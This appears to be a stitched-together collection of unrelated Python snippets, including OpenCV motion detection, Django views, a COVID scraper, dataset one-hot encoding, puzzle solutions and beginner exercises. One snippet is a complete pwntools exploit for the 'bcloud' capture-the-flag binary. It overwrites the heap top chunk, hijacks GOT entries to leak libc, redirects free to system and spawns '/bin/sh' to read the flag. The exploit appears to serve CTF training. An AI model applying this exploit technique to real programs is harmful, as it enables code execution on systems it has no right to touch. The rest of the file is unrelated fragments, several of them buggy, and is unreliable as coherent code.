# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# gray = cv2.GaussianBlur(gray, (21,21), 0)
# if first_frame is None:
# first_frame = gray
# continue
# delta_frame = cv2.absdiff(first_frame, gray)
# thresshold_frame = cv2.threshold(delta_frame, 30 , 255, cv2.THRESH_BINARY) [1]
# thresshold_frame = cv2.dilate(thresshold_frame, None , iterations= 1)
# (cntr,_) = cv2.findContours(thresshold_frame.copy(), cv2.RETR_EXTERNAL , cv2.CHAIN_APPROX_SIMPLE)
# for contour in cntr:
# if cv2.contourArea(contour) < 500:
# continue
# (x,y,w,h) = cv2.boundingRect(contour)
# cv2.rectangle(frame, (x,y) , (x+w , y+h) , (0,255,0), 3)
# cv2.imshow("FRAME", frame)
# key = cv2.waitKey(1)
# if key == ord(" "):
# break
# video.release()
# cv2.destroyAllWindows()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" |
#!/usr/bin/python
#show "Hello World on the LCD screen""
# CByrer
import subprocess
import Adafruit_CharLCD as LCD
import time
lcd = LCD.Adafruit_CharLCDPlate()
Name = subprocess.check_output(['hostname']).strip()
displayText = Name
IP = subprocess.check_output(["hostname", "-I"])
refresh = True
while (True):
if lcd.is_pressed(LCD.SELECT):
lcd.clear()
lcd.message(displayText + "\n")
lcd.set_backlight(1)
lcd.message("Hello World\n")
refresh = True
time.sleep(1)
else:
if refresh:
lcd.clear()
lcd.set_backlight(1)
lcd.message(displayText + "\n")
lcd.message(IP)
time.sleep(1)
refresh = False
|
# Create your views here.
#coding=utf-8
from django.http import *
from django.shortcuts import *
import datetime
def hello(request):
return HttpResponse("hello word")
def loginAction(request):
"""
:param request:
:return:
"""
time = datetime.datetime.now()
return render_to_response('login.html',{'time':time})
|
class Dog(object):
__instance = None#类属性 用来保存对象
__flag = True #默认第一次
def __init__(self,name):
if Dog.__flag:
self.name = name
Dog.__flag = False
def __new__(cls,*ares,**kwargs):
if cls.__instance == None:
cls.__instance = super().__new__(cls)#把对象保存起来
return cls.__instance
else:
#把保存的对象之间返回 不需要创建
return cls.__instance
dog = Dog("小红")
dog1 = Dog("小米")
print(id(dog))
print(id(dog1))
print(dog.name)
print(dog1.name)
|
import os
from enum import Enum
from logging import Logger
from typing import Optional
import pandas as pd
from mdrsl.data_handling.one_hot_encoding.encoding_book_keeping import EncodingBookKeeper
from mdrsl.data_handling.one_hot_encoding.encoding_io import store_encoding_book_keeper
from experiments.utils.experiment_logging import create_logger, close_logger
from experiments.file_naming.column_encodings import get_encodings_book_keeper_abs_file_name_for
from project_info import project_dir
original_data_dir_relative_root = 'data/arcBench/folds_discr2'
processed_data_dir_relative_root = 'data/arcBench_processed/'
one_hot_encoded_data_dir_relative_root = 'data/arcBench_processed/folds_discr2_one_hot_encoded'
class TrainTestEnum(Enum):
train = 'train'
test = 'test'
def get_original_fold_data_dir(train_test: Optional[TrainTestEnum] = None) -> str:
if train_test is None:
original_data_dir = os.path.join(project_dir, original_data_dir_relative_root)
else:
original_data_dir = os.path.join(project_dir, original_data_dir_relative_root, train_test.value)
if not os.path.exists(original_data_dir):
os.makedirs(original_data_dir)
return original_data_dir
def get_original_data_fold_abs_file_name(dataset_name: str, fold_i: int, train_test: TrainTestEnum) -> str:
original_data_dir: str = get_original_fold_data_dir(train_test)
original_data_fold_abs_file_name: str = os.path.join(original_data_dir, f"{dataset_name}{str(fold_i)}.csv")
return original_data_fold_abs_file_name
def get_original_full_data_abs_file_name(dataset_name: str, fold_i: int) -> str:
original_full_data_dir: str = os.path.join(project_dir, processed_data_dir_relative_root, 'full_data')
if not os.path.exists(original_full_data_dir):
os.makedirs(original_full_data_dir)
original_full_data_abs_file_name = os.path.join(original_full_data_dir, f'{dataset_name}{fold_i}.csv')
return original_full_data_abs_file_name
# --- one-hot encoded -------------------------------------------
def get_one_hot_encoded_fold_data_dir(train_test: Optional[TrainTestEnum] = None) -> str:
if train_test is None:
one_hot_encoded_data_dir = os.path.join(project_dir, one_hot_encoded_data_dir_relative_root)
else:
one_hot_encoded_data_dir = os.path.join(project_dir, one_hot_encoded_data_dir_relative_root, train_test.value)
if not os.path.exists(one_hot_encoded_data_dir):
os.makedirs(one_hot_encoded_data_dir)
return one_hot_encoded_data_dir
def get_one_hot_encoded_data_fold_abs_file_name(dataset_name: str, fold_i: int, train_test: TrainTestEnum) -> str:
one_hot_encoded_data_dir: str = get_one_hot_encoded_fold_data_dir(train_test)
one_hot_encoded_data_fold_abs_file_name: str = os.path.join(one_hot_encoded_data_dir,
f"{dataset_name}{str(fold_i)}.csv")
return one_hot_encoded_data_fold_abs_file_name
def get_one_hot_encoded_full_data_abs_file_name(dataset_name: str, fold_i: int) -> str:
one_hot_encoded_full_data_dir: str = os.path.join(project_dir, processed_data_dir_relative_root,
'full_data_one_hot_encoded')
if not os.path.exists(one_hot_encoded_full_data_dir):
os.makedirs(one_hot_encoded_full_data_dir)
one_hot_encoded_full_data_abs_file_name = os.path.join(one_hot_encoded_full_data_dir, f'{dataset_name}{fold_i}.csv')
return one_hot_encoded_full_data_abs_file_name
def convert_to_categorical(dataframe: pd.DataFrame, dataset_name: str, fold_i: int, logger: Optional[Logger]=None) -> pd.DataFrame:
for column in dataframe.columns:
column_type = dataframe[column].dtype
if column_type != object:
dataframe[column] = dataframe[column].astype('object')
if logger is not None:
logger.info(f"{dataset_name}{fold_i}: changed type of column {column} from {column_type} to object")
else:
print(f"{dataset_name}{fold_i}: changed type of column {column} from {column_type} to object")
return dataframe
def one_hot_encode_dataset_fold(dataset_name: str, fold_i: int, ohe_prefix_separator: str) -> None:
"""
One-hot encodes each of the Arch-bench fold train-test splits.
"""
logger = create_logger(
logger_name=f'one_hot_encode{dataset_name}{fold_i}',
log_file_name=os.path.join(get_one_hot_encoded_fold_data_dir(train_test=None),
f"{dataset_name}{fold_i}.log")
)
drop_first = False
# === For fold i ====
# --- Read in the original train and test data from archbench -----------------------------------------------------
original_train_data_fold_abs_file_name = get_original_data_fold_abs_file_name(dataset_name, fold_i,
TrainTestEnum.train)
original_test_data_fold_abs_file_name = get_original_data_fold_abs_file_name(dataset_name, fold_i,
TrainTestEnum.test)
logger.info(f"Loading train fold: {original_train_data_fold_abs_file_name}")
logger.info(f"Loading test fold: {original_test_data_fold_abs_file_name}")
original_train_df = pd.read_csv(original_train_data_fold_abs_file_name, delimiter=',')
original_test_df = pd.read_csv(original_test_data_fold_abs_file_name, delimiter=',')
# --- Set each column to 'object' ------- -------------------------------------------------------------------------
original_train_df = convert_to_categorical(original_train_df, dataset_name, fold_i)
original_test_df = convert_to_categorical(original_test_df, dataset_name, fold_i)
# --- Concatenate the train and test data for the current fold ----------------------------------------------------
nb_of_train_examples = len(original_train_df)
nb_of_test_examples = len(original_test_df)
logger.info(f"Start concatenating train & test folds for {dataset_name}{fold_i}")
original_concat_df = pd.concat([original_train_df, original_test_df], axis=0)
if len(original_concat_df) != nb_of_train_examples + nb_of_test_examples:
raise Exception("unexpected length")
# --- Write out the full discretized dataset of this fold to file for inspection purposes -------------------------
original_full_data_abs_file_name = get_original_full_data_abs_file_name(dataset_name, fold_i)
logger.info(f"Writing out UN-encoded full dataset for {dataset_name}{fold_i}: {original_full_data_abs_file_name}")
original_concat_df.to_csv(original_full_data_abs_file_name, index=False)
# --- One-hot encoded the full data -------------------------------------------------------------------------------
logger.info(f"Start one hot encoding {dataset_name}{fold_i}")
one_hot_encoded_concat_df = pd.get_dummies(original_concat_df,
prefix_sep=ohe_prefix_separator,
drop_first=drop_first)
one_hot_encoded_full_data_abs_file_name = get_one_hot_encoded_full_data_abs_file_name(dataset_name, fold_i)
# --- Write out the one-hot encoded full data ---------------------------------------------------------------------
logger.info(
f"Writing out one hot encoded full dataset for {dataset_name}{fold_i}:"
f" {one_hot_encoded_full_data_abs_file_name}")
one_hot_encoded_concat_df.to_csv(one_hot_encoded_full_data_abs_file_name, index=False)
# --- Create the EncodingBookKeeper and write it to file ----------------------------------------------------------
encoding_book_keeper: EncodingBookKeeper = EncodingBookKeeper. \
build_encoding_book_keeper_from_ohe_columns(one_hot_encoded_concat_df.columns,
ohe_prefix_separator=ohe_prefix_separator)
logger.info(f"Creating one hot encoding book keeper for {dataset_name}{fold_i}")
# %%
encoding_book_keeper_abs_file_name = get_encodings_book_keeper_abs_file_name_for(dataset_name, fold_i)
logger.info(f"Saving one hot encoding book keeper for {dataset_name}{fold_i}: {encoding_book_keeper_abs_file_name}")
store_encoding_book_keeper(encoding_book_keeper_abs_file_name, encoding_book_keeper)
# -- Split the full one-hot encoded dataset back into train and test ----------------------------------------------
one_hot_encoded_train_df = one_hot_encoded_concat_df[:nb_of_train_examples]
one_hot_encoded_test_df = one_hot_encoded_concat_df[nb_of_train_examples:]
if len(one_hot_encoded_train_df) != nb_of_train_examples:
raise Exception("unexpected length")
if len(one_hot_encoded_test_df) != nb_of_test_examples:
raise Exception("unexpected length")
# -- Write out the one-hot encoded train and test -----------------------------------------------------------------
one_hot_encoded_train_abs_file_name = get_one_hot_encoded_data_fold_abs_file_name(dataset_name, fold_i,
TrainTestEnum.train)
one_hot_encoded_test_abs_file_name = get_one_hot_encoded_data_fold_abs_file_name(dataset_name, fold_i,
TrainTestEnum.test)
logger.info(f"Saving one hot encoded train fold: {one_hot_encoded_train_abs_file_name}")
logger.info(f"Saving one hot encoded test fold: {one_hot_encoded_test_abs_file_name}")
one_hot_encoded_train_df.to_csv(one_hot_encoded_train_abs_file_name, index=False)
one_hot_encoded_test_df.to_csv(one_hot_encoded_test_abs_file_name, index=False)
logger.info("---")
close_logger(logger)
def main():
# from project_info import project_dir
prefix_separator = ":=:"
from experiments.arcbench_data_preparation.dataset_info import datasets
# datasets = [dict(filename='labor')]
nb_of_folds: int = 10
for dataset_info in datasets:
dataset_name = dataset_info['filename']
# for dataset_name in ['australian', 'autos', 'credit-g', 'heart-statlog', 'ionosphere', 'segment', 'spambase']:
for fold_i in range(nb_of_folds):
one_hot_encode_dataset_fold(dataset_name, fold_i, ohe_prefix_separator=prefix_separator)
if __name__ == '__main__':
main()
|
import os
import django
import requests
from datetime import datetime
from bs4 import BeautifulSoup
from my_app.models import Stats,News
def populate_stat():
os.environ.setdefault('DJANGO_SETTINGS_MODULE','corona.settings')
django.setup()
url = "https://www.worldometers.info/coronavirus/"
page = requests.get(url)
soup = BeautifulSoup(page.content,'html.parser')
spans = soup.findAll('div',{'class':'maincounter-number'})
lis = []
for i in spans:
lis.append((i.find('span').text))
print('table1 updating ..... ... ...')
s = Stats.objects.get_or_create(total_cases=lis[0],deaths=lis[1],recovered_cases=lis[2],new_date=datetime.now())[0]
s.save()
print('table1 updated......')
def populate_news():
os.environ.setdefault('DJANGO_SETTINGS_MODULE','corona.settings')
django.setup()
url = "https://www.indiatoday.in/coronavirus-covid-19-outbreak?page=&view_type=list"
page = requests.get(url)
soup = BeautifulSoup(page.content,'html.parser')
contain = soup.findAll('div',{'class':'detail'})
news= []
links = []
for i in contain:
a = i.find('a')
href = 'https://www.indiatoday.in'+ a['href']
news.append(i.text)
links.append(href)
print('table2 updating ..... ... ...')
for i in range(len(news)):
n = News.objects.get_or_create(headline=news[i],link=links[i])[0]
n.save()
print('table2 updated......')
|
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = process("./bcloud")
#p = remote("training.jinblack.it", 2016)
gdb.attach(p, '''
#b *0x08048978
b *0x08048a19
b *0x8048a8c''')
context.log_level = 'debug'
f = elf.ELF('./bcloud')
libc = elf.ELF('./libc-2.27.so')
raw_input("Wait")
readGot = 0x0804b00c
freeGot = 0x0804b014
atoiGot = 0x0804b03c
arrayDimNote = 0x0804b0a0
printfPlt = 0x080484d0
def insertName():
p.recvuntil("Input your name:")
p.send("A"*0x3f + "B")
def insertOrg():
p.recvuntil("Org:")
p.send("C"*0x40)
def insertHost():
p.recvuntil("Host:")
p.sendline("DDDD" + "EEEE" + p32(0xffffffff))
def newNote(size, content):
p.sendline("1")
p.recvuntil("content:")
p.sendline("%d" % size)
p.recvuntil("content:")
if size > 0:
p.sendline(content)
def editNote(id_, content):
p.sendline("3")
p.recvuntil("id:")
p.sendline("%d" % id_)
p.recvuntil("content:")
p.sendline(content)
def deleteNote(id_):
p.sendline("4")
p.recvuntil("id:\n")
p.sendline("%d" %id_)
return u32(p.recv(4))
insertName()
p.recvuntil("B")
leak = u32(p.recv(4))
print "LEAK: %#x" % leak
insertOrg()
time.sleep(0.1)
insertHost() #sovrascrivo dimensione top_chunk con 0xffffffff
#leak address name buffer 0x0804c160
#top_chunk address after org 0x0804c258
heapBase = leak - 0x160
topChunk = heapBase + 0x25c
print "HeapBase: %#x" % heapBase
print "topChunk: %#x" % topChunk
toMalloc = arrayDimNote - topChunk - 18
newNote(toMalloc, "")
payload = p32(4)*10
payload += "\x00"*(0x0804b120 - 0x0804b0a0 - 10 - 30)
payload += p32(freeGot)
#payload += p32(freeGot)
#payload += "ls"
payload += p32(atoiGot)
newNote(len(payload), payload) #scrive partendo da arrayDimNote 0x0804b0a0
editNote(0, p32(printfPlt))
atoi_libc = deleteNote(1)
print "atoi_libc: %#x" % atoi_libc
libc_base = atoi_libc - libc.symbols['atoi']
systemAddr = libc_base + libc.symbols['system']
print "libc_base: %#x" % libc_base
print "systemAddr: %#x" % systemAddr
editNote(0, p32(systemAddr))
sh = "/bin/sh\x00"
ls = "ls"
cat_flag = "cat flag"
newNote(len(sh), sh)
newNote(len(cat_flag), cat_flag)
newNote(len(ls), ls)
deleteNote(2)
#p.recvuntil("id:\n")
#p.sendline("ls")
#prima di Deleted message ho f7e09b40 se deleto 1 --> atoi_libc
#prima di Deleted message ho 080484d0 se deleto 0
p.interactive() |
# -*- coding:utf-8 -*-
# -------------------------------
# ProjectName : autoDemo
# Author : zhangjk
# CreateTime : 2020/6/23 20:32
# FileName : 2
# Description :
# --------------------------------
def gys(a,b):
if a < b:
b,a = a,b
while a%b!=0:
a,b = b,a%b
print(b)
ages = [5, 16, 19, 22, 26, 39, 45]
def myFunc(x):
print('x..',x)
if x < 18:
return False
else:
return True
def f2():
adults = filter(myFunc, ages)
for x in adults:
print(x)
def Power(x,n):
d = 1
for i in range(n):
d = d*x
return d
def main():
# gys(12,15)
# f2()
print(Power(2,3))
if __name__ == '__main__':
main() |
# -*-coding:utf-8-*-
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_assets import Environment
db = SQLAlchemy()
mail = Mail()
assets_env = Environment()
|
import random
num = int(input())
lst = random.sample(range(1, 20), 10)
# PRE: `num` is an integer, `lst` is a list of integers of size N > 0
i = 0
num_found = False
# INVARIANT: i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
# AFTER INITIALIZATION: `i` == 0 and `num_found` == False, `num` not in {} (empty list) => OK
while i < len(lst):
# INVARIANT: i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
# AND
# i < len(lst)
if lst[i] == num:
num_found = True
# So:
# i < len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i}, otherwise `num_found` == True
i += 1
# i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
# So:
# INVARIANT is maintained
# After TERMINATION:
# INVARIANT holds
# AND
# i >= len(lst)
# So:
# `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_(len(lst)-1}, otherwise `num_found` == True
# => POST CONDITION
# FINITENESS:
# - VARIANT: N - `i`
# - LOWER BOUND: `i` is at most equal to
# N due to the loop condition, at that point the variant is
# equal to 0: the lower bound of the variant
# - MONOTONIC DECREASE: at each iteration, `i` is increased by exactly 1
# and the length of lst is constant.
# Therefore, the variant N - `i` decreases by exactly one.
# - FINITE NUMBER OF DECREMENTS: since the variant decreases
# monotonically by one at each iteration and N is constant,
# the lower bound will be reached at which point the loop ends.
# POST: `num_found` == True if `num` ∈ `lst`, otherwise `num_found` == False
if (num_found): print("Number " + str(num) + " was found in list " + str(lst))
else: print("Number " + str(num) + " was not found in list " + str(lst)) |
from enum import Enum
class Dir(Enum):
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
class State(Enum):
CLEAN = 0
WEAKENED = 1
INFECTED = 2
FLAGGED = 3
DIR_ORDER = [Dir.UP, Dir.RIGHT, Dir.DOWN, Dir.LEFT]
def turn(dir, diff):
return DIR_ORDER[(DIR_ORDER.index(dir) + diff) % len(DIR_ORDER)]
def turn_left(dir):
return turn(dir, -1)
def turn_right(dir):
return turn(dir, +1)
def reverse_dir(dir):
return turn(dir, +2)
def move(dir, x, y):
if dir == Dir.UP:
return x, y - 1
elif dir == Dir.RIGHT:
return x + 1, y
elif dir == Dir.DOWN:
return x, y + 1
elif dir == Dir.LEFT:
return x - 1, y
def run_virus(states, pos, dir, bursts):
num_infected = 0
for i in range(bursts):
s = states.get(pos, State.CLEAN)
if s == State.INFECTED:
dir = turn_right(dir)
states.pop(pos)
else:
dir = turn_left(dir)
states[pos] = State.INFECTED
num_infected += 1
pos = move(dir, *pos)
return num_infected
def run_virus_pt2(states, pos, dir, bursts):
num_infected = 0
for i in range(bursts):
s = states.get(pos, State.CLEAN)
if s == State.CLEAN:
dir = turn_left(dir)
states[pos] = State.WEAKENED
elif s == State.WEAKENED:
states[pos] = State.INFECTED
num_infected += 1
elif s == State.INFECTED:
dir = turn_right(dir)
states[pos] = State.FLAGGED
elif s == State.FLAGGED:
dir = reverse_dir(dir)
states.pop(pos)
pos = move(dir, *pos)
return num_infected
def main():
#with open('day22.input.txt') as f:
# grid = [[c == '#' for c in line.strip()] for line in f.readlines()]
grid = [[False, False, True], [True, False, False], [False, False, False]]
height = len(grid)
width = len(grid[0])
pos = (width // 2, height // 2)
dir = Dir.UP
states = {}
for y, row in enumerate(grid):
for x, c in enumerate(row):
if c:
states[(x, y)] = State.INFECTED
print(run_virus(states, pos, dir, 10000))
print(run_virus_pt2(states, pos, dir, 100))
if __name__ == '__main__':
main()
|
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
def reverse(number):
position1 = number % 10
remainder1 = number // 10
position2 = remainder1 % 10
remainder2 = remainder1 // 10
position3 = remainder2
return int(str(position1) + str(position2) + str(position3))
def is_palindrome(number):
value = number
if value == reverse(number):
return 'This is a palindrome'
else:
return 'This is not a palindrome'
def main():
number_test = eval(input("Enter a four digit number to test if it's a palindrome: "))
print(is_palindrome(number_test))
main() |
import random
import redis
from configs import products
def main():
r = redis.client.StrictRedis(db=0)
r.flushdb()
list_products = products
random.shuffle(products)
product_men = products[0:400]
random.shuffle(products)
product_brand1 = products[0:200]
product_brand2 = products[200:400]
random.shuffle(products)
product_blue = products[0:100]
pipe = r.pipeline()
[pipe.sadd('products', x) for x in list_products]
[pipe.sadd('products:men', x) for x in product_men]
[pipe.sadd('products:brand1', x) for x in product_brand1]
[pipe.sadd('products:brand2', x) for x in product_brand2]
[pipe.sadd('products:color:blue', x) for x in product_blue]
pipe.execute()
print 'INTER EXAMPLE'
print "========" * 5
result = r.sinter(['products', 'products:men', 'products:color:blue'])
print 'total product : %s' % len(result)
print result
print '\n' * 4
print 'UNION EXAMPLE'
print "========" * 5
r.sunionstore('union:brand1:brand2', ['products:brand1', 'products:brand2'])
result2 = r.sinter(['products', 'products:men', 'union:brand1:brand2', 'products:color:blue'])
print 'total product : %s' % len(result2)
print result2
if __name__ == '__main__':
main() |
import pymongo
import datetime
import os
def get_result(f,t,s,r):
client = pymongo.MongoClient()
repo = client.repo
repo.authenticate('minteng_tigerlei_zhidou', 'minteng_tigerlei_zhidou')
# user will set the grade they want
transport=t
food=f
safety=s
rent=r
#find the fitted area
def if_fitted(A,requirement):#[t,f,s,r] is the requirment/standred
[t1,f1,s1,r1]=A
[t,f,s,r]=requirement
if r1=='Not found':
return False
if t1>=t and f1>=f and s1>=s and r1>=r:
return True
return False
def get_dist(A,requirement):
[t1,f1,s1,r1]=A
[t,f,s,r]=requirement
if r1=='Not found':
return 1000
return ((t1-t)**2+(f1-f)**2+(s1-s)**2+(r1-r)**2)**0.5
res=[]
a=repo['minteng_tigerlei_zhidou.box_count'].find()
for i in a:
grade1=[i['grade']['transport'],i['grade']['food'],i['grade']['safety'],i['grade']['rent']]
if if_fitted(grade1,[transport,food,safety,rent]):
temp=i
temp['rating']=sum(i['grade'].values())
res.append(temp)
else:
temp=i
temp['rating']=get_dist(grade1,[transport,food,safety,rent])*-1
res.append(temp)
#return top fitted
result=sorted(res, key=lambda x: x['rating'], reverse=True)
top5 = result[0:5]
for i in range(5):
top5[i]['rank'] = i + 1
# get crime num
crimeCount=[]
crimeTotal=[]
max = 0
b=repo['minteng_tigerlei_zhidou.crimeCount'].find()
for i in b:
tempT = {}
tempT['label'] = i['area'] + "(" + str(i['_id']) + ")"
tempT['emp'] = sum(i['crimeNum'])
tempT['area'] = i['_id']
tempT['ind'] = "crimeNum"
max = tempT['emp'] if tempT['emp'] > max else max
crimeTotal.append(tempT)
for j in top5:
if (j['box'] == i['box']):
temp = {}
temp['crimeRatio'] = i['crimeRatio']
temp['bracket'] = j['rank']
temp['area'] = j['area']
crimeCount.append(temp)
output=sorted(crimeCount, key=lambda x: x['bracket'])
curpath = os.path.abspath(os.curdir)
with open(os.path.join(curpath, 'static/top5.tsv'), 'w') as f:
f.write('year\tbracket\tcrimeRatio\n')
for i in range(48):
year = 2013 + i // 12
for block in output:
f.write(str(year) + '\t' + str(block['bracket']) + '\t' + str(block['crimeRatio'][i]) + '\n')
with open(os.path.join(curpath, 'static/top5Name.tsv'), 'w') as f:
f.write('1\t2\t3\t4\t5\n')
for block in output:
f.write(str(block['bracket']) + ': ' +block['area'] + '\t')
if not os.path.exists(os.path.join(curpath, 'static/crimeTotal.csv')):
with open(os.path.join(curpath, 'static/crimeTotal.csv'), 'w') as f:
f.write("area,label,ind,emp\n")
for i in crimeTotal:
f.write(str(i['area']) + ',' + i['label'] + ',' + i['ind'] + ',' + str(i['emp']) + '\n')
f.flush()
for i in crimeTotal:
f.write(str(i['area']) + ',' + i['label'] + ',' + "Difference with Max" + ',' + str(max - i['emp']) + '\n')
f.flush()
# for mapping
for i in result:
i['center']=[(i['box'][0][0]+i['box'][1][0])/2,(i['box'][0][1]+i['box'][1][1])/2]
for i in result:
i['leftdown']=[i['box'][0][0],i['box'][0][1]]
i['leftup']=[i['box'][0][0],i['box'][1][1]]
i['rightdown']=[i['box'][1][0],i['box'][0][1]]
i['rightup']=[i['box'][1][0],i['box'][1][1]]
return result
get_result(3,4,3,4)
|
from wave_app import db
class User(db.Model):
__tablename__ = 'User'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), nullable=False)
password = db.Column(db.String, nullable=False)
level = db.Column(db.String(15), nullable=False)
waves = db.relationship('Search', backref='User', cascade='all,delete-orphan')
class Search(db.Model):
__tablename__ = 'Search'
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.Date)
time = db.Column(db.Integer)
avg = db.Column(db.Float, nullable=False)
hg = db.Column(db.Float, nullable=False)
sec = db.Column(db.Float, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('User.id'))
|
# Assignment_1, 11 Aug 14, 05:09
__author__ = 'subin'
# Function For Addition
def Addition(First_Input,Second_Input):
Add=First_Input+Second_Input
return Add # Return result of Addition
# Function For Subtraction
def Subtraction(First_Input,Second_Input):
Sub=First_Input-Second_Input
return Sub # Return result of Subtraction
# Function For Multiplication
def Multiplication(First_Input,Second_Input):
Mul=First_Input*Second_Input
return Mul # Return result of Multiplication
# Function For Division
def Division(First_Input,Second_Input):
Div=[0,1]
Div[0] = First_Input/Second_Input
Div[1] = First_Input%Second_Input
return Div # Return result of Division
# Read first number
First_Input = input('Give your first input: ')
# Read second number
Second_Input = input('Give your second input: ')
# Call function Addition
Sum = Addition(First_Input, Second_Input)
# Call function Subtraction
Diff = Subtraction(First_Input, Second_Input)
# Call function Multiplication
Prod = Multiplication(First_Input, Second_Input)
# Call function Division
Quot = Division(First_Input, Second_Input)
# Print sum
print 'Sum of {0} and {1} is {2}.'.format(First_Input, Second_Input, Sum)
# Print difference
print 'Difference of {0} and {1} is {2}.'.format(First_Input, Second_Input, Diff)
# Print product
print 'Product of {0} and {1} is {2}.'.format(First_Input, Second_Input, Prod)
# Print quotient and reminder
print 'Quotient of {0} and {1} is {2} and reminder is {3}.'.format(First_Input, Second_Input, Quot[0], Quot[1])
|
__copyright__ = """\
(c). Copyright 2008-2020, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
import os, sys
from vyperlogix import misc
def killProcByPID(pid,isVerbose=False):
info_string = ''
if (isVerbose):
print >>sys.stderr, '(%s) :: sys.platform is "%s".' % (misc.funcName(),sys.platform)
if (sys.platform == 'win32'):
def kill(pid):
info_string = ''
from vyperlogix.win import WinProcesses
p = WinProcesses.WinProcesses()
proc_handle = p.openProcessTerminateForPID(pid)
if (isVerbose):
print >>sys.stderr, '(%s) :: proc_handle is "%s".' % (misc.funcName(),proc_handle)
if (proc_handle):
try:
import win32api
win32api.TerminateProcess(proc_handle, -1)
except Exception as details:
from vyperlogix.misc import _utils
info_string += _utils.formattedException(details=details)
try:
import ctypes
ctypes.windll.kernel32.TerminateProcess(proc_handle, -1)
except Exception as details:
from vyperlogix.misc import _utils
info_string += _utils.formattedException(details=details)
print >>sys.stderr, 'ERROR: Cannot Kill the process with pid of %s due to a system error.' % (pid)
print >>sys.stderr, info_string
finally:
p.closeProcessHandle(proc_handle)
if (isVerbose):
print >>sys.stderr, '(%s) :: kill(%d).' % (misc.funcName(),pid)
kill(pid)
else:
try:
os.kill(pid)
except Exception as details:
from vyperlogix.misc import _utils
info_string += _utils.formattedException(details=details)
print >>sys.stderr, 'ERROR: Cannot kill the process !'
print >>sys.stderr, info_string
if (isVerbose):
print >>sys.stderr, '(%s) :: info_string is "%s".' % (misc.funcName(),info_string)
if __name__ == "__main__":
import sys
print >>sys.stdout, __copyright__
print >>sys.stderr, __copyright__
|
class Node:
def __init__(self, inputVal):
self.value = inputVal
self.next = None
class Stack:
def __init__(self):
self.top = None
def push(self, value):
newnode = Node(value)
if self.top == None:
self.top = newnode
else:
newnode.next = self.top
self.top = newnode
return self
def pop(self):
if self.top != None:
topvalue = self.top.value
self.top = self.top.next
# x = {
# 'value': topvalue,
# 'self': self
# }
return topvalue
else:
print("nothing to pop aka you got no pancakes")
return self
def size(self):
count = 0
if self.top == None:
return count
else:
runner = self.top
while runner != None:
count += 1
runner = runner.next
print(count)
return count
def compareStacks(stack1, stack2):
if stack1 == None or stack2 == None:
return False
if stack1.size() != stack2.size():
return False
else:
runner1 = stack1.top
runner2 = stack2.top
while runner1 != None:
if runner1 != runner2:
return False
else:
runner1 = runner1.next
runner2 = runner2.next
return True
|
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import glob, os, sys
import xml.etree.ElementTree as ET
import math
STEP = 8
# The path in the console arguments.
path = sys.argv[1]
imgs= sorted(glob.glob(os.path.join(path, '*.jpg')) + glob.glob(os.path.join(path, '*.JPG')))
xmls = sorted(glob.glob(os.path.join(path, '*.xml')) + glob.glob(os.path.join(path, '*.XML')))
for i in range(len(imgs)):
print(imgs[i])
img = mpimg.imread(imgs[i])
size_orignal = img.shape[0] if img.shape[0] > img.shape[1] else img.shape[1]
img = img[list(range(0, img.shape[0], STEP)),:,:]
img = img[:,list(range(0, img.shape[1], STEP)),:]
mpimg.imsave(imgs[i], img)
tree = ET.parse(xmls[i])
root = tree.getroot()
ratio = math.ceil(size_orignal / img.shape[0])
for size in root.iter('size'):
size.find('width').text = str(img.shape[1])
size.find('height').text = str(img.shape[0])
for box in root.iter('bndbox'):
x = str(int(box.find('xmin').text) // ratio)
box.find('xmin').text = x
y = str(int(box.find('ymin').text) // ratio)
box.find('ymin').text = y
x = str(int(box.find('xmax').text) // ratio)
box.find('xmax').text = x
y = str(int(box.find('ymax').text) // ratio)
box.find('ymax').text = y
tree.write(xmls[i])
|
"""Make a time table acript that ask user the following things:
1- how many tables you want to print
2- what should be user starting point
3 = ending point point of table
NOTE: tables should be print horizentally """
if __name__ == "__main__":
table_no = int(input('Enter table no: '))
start = int(input('starting point of table: '))
end = int(input('Ending point of table: '))
for i in range(start, end + 1):
for table in range(1, table_no + 1):
print(f"{table} x {i} = {table_no * i} ", end='\t')
print()
|
import numpy as np
interestRate = 0.07
numberOfMonths = 25*12;
principalBorrowed = 3500000
principal2Pay = np.ppmt(interestRate/12, 1, numberOfMonths, principalBorrowed);
interest2Pay = np.ipmt(interestRate/12, 1, numberOfMonths, principalBorrowed);
print("Loan amount:%7.2f"%principalBorrowed);
print("Loan duration in months:%d"%numberOfMonths);
print("Annual Interest Rate in percent:%2.2f"%(interestRate*100));
print("Principal to be paid:%5.2f"%abs(principal2Pay));
